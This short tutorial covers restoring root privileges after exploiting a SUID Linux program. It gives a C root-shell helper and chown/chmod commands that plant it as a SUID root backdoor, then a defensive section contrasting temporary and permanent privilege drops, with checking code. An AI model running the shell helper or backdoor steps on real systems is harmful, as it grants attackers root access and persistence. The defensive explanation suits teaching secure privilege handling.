Restoring Privileges

Many SUID root Linux programs drop their root privileges while running, so exploiting them can leave you with a shell that apparently has only the same privileges as the invoking user. This is frequently seen when exploiting a call to the system() function. Restoring those privileges is a simple matter of calling one library function: setuid().


To help with this, you can use the following C code:

#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[])   /* argv is an array of strings, not a single char * */
{
    printf("Please enjoy this complimentary shell:\n");
    /* Copy the effective (SUID) ids over the real ids, so the shell we
     * exec keeps them instead of dropping back to the real user */
    setuid(geteuid());
    setgid(getegid());
    execl("/bin/sh", "sh", (char *)NULL);  /* the argument list must end in a NULL pointer */
    perror("execl");                       /* only reached if the exec failed */
    return 1;
}

Compile it with GCC:

gcc restore.c -o elevatedshell

And then get your exploit to run the program.


If you manage to find a way to arbitrarily set the owner of a file to root and enable the SUID bit, this file can also be used as a backdoor:

chown root:root elevatedshell && chmod u+s elevatedshell

You can't do this with an interpreted bash script: Linux simply ignores the SUID bit on shell scripts, but it does honour it on compiled programs.
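Seen from the program author's side, the trick above only works because the privilege drop was temporary: seteuid() changes the effective uid but leaves the saved set-user-ID at 0, which setuid(geteuid()) then picks up. The following C program is an added example (not code from the original post; the function names are my own) showing that pattern next to a permanent drop with setgid()/setuid(), which as root rewrites the real, effective and saved ids, after which any attempt to become root again fails with EPERM.

```c
#define _DEFAULT_SOURCE   /* glibc: declares setgroups() */
#include <grp.h>
#include <stdio.h>
#include <unistd.h>

/* Permanent drop. For a root process setgid()/setuid() set the real,
 * effective AND saved ids, so no saved uid 0 is left for setuid(geteuid())
 * to recover. Order: supplementary groups, gid, then uid. Returns 0 on
 * success, -1 on failure; a caller must not continue after a failure. */
int drop_privileges_permanently(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (geteuid() == 0 && setgroups(0, NULL) != 0)  /* root only */
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    return 0;
}

/* Temporary drop, the pattern the post relies on: only the effective ids
 * change, the saved set-user-ID stays 0, so root can be restored later. */
int drop_privileges_temporarily(void)
{
    return (setegid(getgid()) == 0 && seteuid(getuid()) == 0) ? 0 : -1;
}

/* 1 if the process can (still) become root, 0 if it cannot. After a
 * permanent drop this is 0 unless the real uid itself is 0. */
int can_regain_root(void)
{
    uid_t before = geteuid();
    if (before == 0)
        return 1;
    if (seteuid(0) != 0)
        return 0;          /* EPERM: no saved uid 0 to return to */
    seteuid(before);       /* restore the caller's effective uid */
    return 1;
}

int main(void)
{
    if (drop_privileges_permanently() != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("can regain root: %s\n", can_regain_root() ? "yes" : "no");
    return 0;
}
```

Compiled and installed SUID root, the binary prints "no" when run by an ordinary user; swap in drop_privileges_temporarily() and it prints "yes", which is exactly the state the complimentary shell above exploits.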
